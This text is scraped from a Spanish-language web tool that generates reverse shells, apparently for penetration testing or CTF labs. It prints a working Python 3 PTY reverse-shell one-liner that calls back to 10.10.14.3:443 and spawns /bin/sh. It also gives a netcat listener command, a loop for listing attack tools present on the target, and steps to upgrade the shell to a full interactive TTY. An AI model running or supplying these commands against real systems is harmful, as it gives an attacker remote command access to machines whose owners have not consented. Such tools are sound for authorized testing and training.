Generador de reverse shell
Endpoint de callback
10.10.14.3:443IP
Puerto
443 y 80 atraviesan la mayoría de firewalls de salida; los puertos altos poco comunes suelen bloquearse.
Comando de escucha
Comando a ejecutar
$nc -lvnp 443Perfil del objetivo
SO objetivo
Arquitectura de CPU
Acceso saliente
Herramientas disponibles en el objetivo
Deja las herramientas sin seleccionar cuando no estés seguro de qué existe en el objetivo.
¿No estás seguro? Ejecuta esto en el objetivo para listar las herramientas disponibles y sus rutas completas:
$for b in sh bash python3 python perl ruby node php nc ncat socat openssl curl wget awk; do p=$(command -v "$b" 2>/dev/null || ls /usr/bin/$b /bin/$b /usr/local/bin/$b /usr/sbin/$b /sbin/$b 2>/dev/null | head -1); [ -n "$p" ] && echo "$b: $p"; doneModo
Runtime / herramienta
Ruta del shell
Alta compatibilidad 100%Totalmente interactiva — TTY al conectar.
Técnica10 / 138
Callback TCP reversemulti
Python 3 PTY · multi · Reverse shell Python 3 que spawnea el shell seleccionado mediante pty.
Transformación
Solo se muestran las transformaciones compatibles.
Salida del comando
$python3 -c 'import os,pty,socket;s=socket.socket();s.connect(("10.10.14.3",443));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")'Escuchador
$nc -lvnp 443+ ¿No lo tienes? Instala la herramienta del listener
sudo apt install netcat-openbsd # macOS: brew install netcatMejora de sesión
Receta de mejora
Reemplaza el tamaño fijo con las dimensiones de tu terminal: stty rows $(tput lines) columns $(tput cols)
Pasos de mejora
$python3 -c 'import pty; pty.spawn("/bin/sh")' || python -c 'import pty; pty.spawn("/bin/sh")' $Ctrl-Z $stty raw -echo; fg $reset $export TERM=xterm-256color $stty rows 40 columns 120
Limpieza de sesión
Asistente de limpieza
Pasos de limpieza
$export SHELL=/bin/sh $export TERM=xterm-256color $export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH $alias ll='ls -la'